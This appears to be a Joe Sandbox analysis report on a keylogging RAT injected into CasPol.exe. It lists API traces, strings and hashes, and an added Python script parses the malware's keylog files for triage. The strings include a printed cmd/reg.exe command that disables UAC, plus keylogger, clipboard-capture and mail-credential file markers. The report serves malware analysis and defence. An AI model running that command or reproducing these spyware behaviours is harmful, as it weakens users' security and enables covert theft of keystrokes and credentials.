                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: abb8dc7b00a9e6ff34b690eb976e7739615ebad0393437c6e772e82f3a0abea1
• Instruction ID: 628ed4293515944fb4ff5177b0ed0b0109413660cb9ab4ef9b2c29076bfe53c7
• Opcode Fuzzy Hash: abb8dc7b00a9e6ff34b690eb976e7739615ebad0393437c6e772e82f3a0abea1
• Instruction Fuzzy Hash: 39F02839140612B6D212D3649C87F5F32A6EFC96B1BB98124FE18BE191EF31DCD28463
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
• Opcode ID: e3fd1fc0c4787dc830b9cc3aea4eca8ac28d7cc032c9db4aeba6401df1942e4a
• Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
• Opcode Fuzzy Hash: e3fd1fc0c4787dc830b9cc3aea4eca8ac28d7cc032c9db4aeba6401df1942e4a
• Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
• Opcode ID: cfedba9a7b07c5c42209e7ce9dcc6e811ae6a6b2ec58d24d97ebf78adb97293c
• Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
• Opcode Fuzzy Hash: cfedba9a7b07c5c42209e7ce9dcc6e811ae6a6b2ec58d24d97ebf78adb97293c
• Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
• Opcode ID: 714e6f05c059ed682b6d949b249bc3bacd7887d9d17cdc3247a131cf9d717c91
• Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
• Opcode Fuzzy Hash: 714e6f05c059ed682b6d949b249bc3bacd7887d9d17cdc3247a131cf9d717c91
• Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
APIs
• RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
• RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Enum$InfoQueryValue
• String ID: [regsplt]$DG
• API String ID: 3554306468-1089238109
• Opcode ID: 4234e3916868af505b3244b049647076bd482d9df227b43fd1b9f38754dba18e
• Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
• Opcode Fuzzy Hash: 4234e3916868af505b3244b049647076bd482d9df227b43fd1b9f38754dba18e
• Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
APIs
  • Part of subcall function 04571E89: lstrlenW.KERNEL32(?,?,?,?,?,045710DF,?,?,?,00000000), ref: 04571E9A
  • Part of subcall function 04571E89: lstrcatW.KERNEL32(?,?,?,045710DF,?,?,?,00000000), ref: 04571EAC
  • Part of subcall function 04571E89: lstrlenW.KERNEL32(?,?,045710DF,?,?,?,00000000), ref: 04571EB3
  • Part of subcall function 04571E89: lstrlenW.KERNEL32(?,?,045710DF,?,?,?,00000000), ref: 04571EC8
  • Part of subcall function 04571E89: lstrcatW.KERNEL32(?,045710DF,?,045710DF,?,?,?,00000000), ref: 04571ED3
• GetFileAttributesW.KERNEL32(?,?,?,?), ref: 0457122A
  • Part of subcall function 0457173A: _strlen.LIBCMT ref: 04571855
  • Part of subcall function 0457173A: _strlen.LIBCMT ref: 04571869
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
• Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
Similarity
• API ID: lstrlen$_strlenlstrcat$AttributesFile
• String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
• API String ID: 4036392271-1520055953
• Opcode ID: 80e510a6b84755129a0be8859c6db6eaa90f9006f88e2034004d4fb227d269f3
• Instruction ID: 115c75bf5a9449e08d74ba4350823b212561340f7316840e6af25785c6616a1c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80e510a6b84755129a0be8859c6db6eaa90f9006f88e2034004d4fb227d269f3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD2198B9A506186BE710A790FC81FED7339FF80B15F001555FA04E72D0EAB17D858759
APIs
  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
• __Init_thread_footer.LIBCMT ref: 0040AEA7
  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
• String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
• API String ID: 2974294136-753205382
• Opcode ID: 6a42bb2a480eb043f98db2134829ca83a8d3048ecc62eae8b68ba6343dcb75fe
• Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
• Opcode Fuzzy Hash: 6a42bb2a480eb043f98db2134829ca83a8d3048ecc62eae8b68ba6343dcb75fe
• Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
APIs
• GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
• wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: EventLocalTimewsprintf
• String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
• API String ID: 1497725170-248792730
• Opcode ID: 4a46a74ce4dc637b5b74a9ad9fe6ae49bf816b22ad3df8bf75a5d637a5b9b51e
• Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
• Opcode Fuzzy Hash: 4a46a74ce4dc637b5b74a9ad9fe6ae49bf816b22ad3df8bf75a5d637a5b9b51e
• Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
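The function above stamps a session header with GetLocalTime and wsprintfW using the "[%04i/%02i/%02i %02i:%02i:%02i " format and the "Offline Keylogger Started" marker, and the clipboard-handling function earlier in this section carries the "[Text copied to clipboard]" and "[End of clipboard]" markers. Together they give enough of the keylog layout to triage a suspected log file offline. The script below is an added example, not code from Joe Sandbox or from the sample: it assumes the header is written as `[YYYY/MM/DD HH:MM:SS Offline Keylogger Started]` in that fragment order (inferred from the string list, not stated by the report), that the file may be UTF-16LE (wsprintfW) or 8-bit, and the sample log bytes and function names are this example's own.

```python
"""Triage a suspected Remcos offline keylogger file using the markers from
the report's string pool. Added example; the sample log is constructed."""
import re
from datetime import datetime

# Session header assumed to be wsprintfW("[%04i/%02i/%02i %02i:%02i:%02i ",
# GetLocalTime fields) + "Offline Keylogger Started" + "]"; the order of the
# three fragments is inferred from the string list, not stated by the report.
SESSION_RE = re.compile(
    r"\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) Offline Keylogger Started\]"
)
# Clipboard captures are bracketed by the two clipboard markers.
CLIP_RE = re.compile(
    r"\[Text copied to clipboard\](.*?)\[End of clipboard\]", re.DOTALL
)
# wsprintfW writes UTF-16LE, but try 8-bit decodings too and keep whichever
# decoding yields the most marker hits.
ENCODINGS = ("utf-16-le", "utf-8", "latin-1")


def _to_datetime(groups):
    """Six captured digit groups -> datetime, or None for junk that only
    looks like a timestamp (e.g. month 13)."""
    try:
        return datetime(*(int(g) for g in groups))
    except ValueError:
        return None


def parse_keylog(blob):
    """Return {'encoding', 'sessions': [datetime...], 'clipboard': [str...],
    'score'} for the decoding with the most marker hits, or None if no
    marker is found under any decoding."""
    best = None
    for enc in ENCODINGS:
        try:
            text = blob.decode(enc)
        except UnicodeDecodeError:
            continue  # e.g. odd-length data is not valid UTF-16LE
        sessions = [
            d for d in (_to_datetime(m.groups()) for m in SESSION_RE.finditer(text)) if d
        ]
        clips = [m.group(1).strip() for m in CLIP_RE.finditer(text)]
        score = len(sessions) + len(clips)
        if score and (best is None or score > best["score"]):
            best = {"encoding": enc, "sessions": sessions, "clipboard": clips, "score": score}
    return best


def session_timeline(blob):
    """Sorted session start times, for correlating with process-creation
    telemetry from the same host."""
    parsed = parse_keylog(blob)
    return sorted(parsed["sessions"]) if parsed else []


# Constructed UTF-16LE log with two session headers and one clipboard capture.
SAMPLE_LOG = (
    "[2024/11/14 09:12:07 Offline Keylogger Started]\r\n"
    "typed text goes here\r\n"
    "[Text copied to clipboard]\r\nhunter2\r\n[End of clipboard]\r\n"
    "[2024/11/14 13:40:55 Offline Keylogger Started]\r\n"
).encode("utf-16-le")

if __name__ == "__main__":
    result = parse_keylog(SAMPLE_LOG)
    print(result["encoding"], [s.isoformat() for s in result["sessions"]], result["clipboard"])
```

Scoring the decodings rather than trusting a BOM or file extension matters because the dropped file rarely carries either; a UTF-16LE log decoded as UTF-8 yields NUL-interleaved text that matches no marker, so the decoder with real hits wins.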
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
• Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
• CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleSizeSleep
• String ID: `AG
• API String ID: 1958988193-3058481221
• Opcode ID: 4b7d965d3464bb2d060ecaad018a0c75fbc041bdc5d21b9523507d02d46e7123
• Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
• Opcode Fuzzy Hash: 4b7d965d3464bb2d060ecaad018a0c75fbc041bdc5d21b9523507d02d46e7123
• Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
APIs
• RegisterClassExA.USER32(00000030), ref: 0041CA6C
• CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
• GetLastError.KERNEL32 ref: 0041CA91
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ClassCreateErrorLastRegisterWindow
• String ID: 0$MsgWindowClass
• API String ID: 2877667751-2410386613
• Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
• Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
• Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
• Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
APIs
• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
• CloseHandle.KERNEL32(?), ref: 00406A0F
• CloseHandle.KERNEL32(?), ref: 00406A14
Strings
• C:\Windows\System32\cmd.exe, xrefs: 004069FB
• /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreateProcess
• String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
• API String ID: 2922976086-4183131282
• Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
• Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
• Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
• Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,04574AEA,?,?,04574A8A,?,04582238,0000000C,04574BBD,00000000,00000000), ref: 04574B59
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 04574B6C
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,04574AEA,?,?,04574A8A,?,04582238,0000000C,04574BBD,00000000,00000000,00000001,04572082), ref: 04574B8F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                  • Opcode ID: 1b537995a4c616640414bf2cba446bd44f06d81ebadf12740b7598c98e01f00f
                                                                                                                                                                                                                                  • Instruction ID: a0822a8217a9698ba5c585db3661360586681567834f35602d364a1ba7e62024
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b537995a4c616640414bf2cba446bd44f06d81ebadf12740b7598c98e01f00f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5F03C31A00218ABDB11AFA0FC09F9DBFB9FF45751F004178E809A6150DB79AD49EA90
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 004425F9
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 0044262F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                  • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                                                                                                                  • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateValue
                                                                                                                                                                                                                                  • String ID: pth_unenc$BG
                                                                                                                                                                                                                                  • API String ID: 1818849710-2233081382
                                                                                                                                                                                                                                  • Opcode ID: 87978d4cbb2bd718b7edbb20148c75b812c3e6c6230698840110c73191dabcb0
                                                                                                                                                                                                                                  • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87978d4cbb2bd718b7edbb20148c75b812c3e6c6230698840110c73191dabcb0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10014BF2,00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002), ref: 10014C61
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10014C74
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,10014BF2,00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002), ref: 10014C97
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                  • Opcode ID: 873052653539bccc7e1ea00198fc24244249cfb0554d021f73da006c918f9e5c
                                                                                                                                                                                                                                  • Instruction ID: b1000cfdb8d1dca94868537454e3314dce1bc17294372af6874ad0ad3cb996e2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 873052653539bccc7e1ea00198fc24244249cfb0554d021f73da006c918f9e5c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAF06230901228BBEB41DF90DC48FAEBFB8EF15355F514168F909A6160CF309E92DB90
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(000002D0), ref: 00404AF9
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404B04
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00404B0D
                                                                                                                                                                                                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
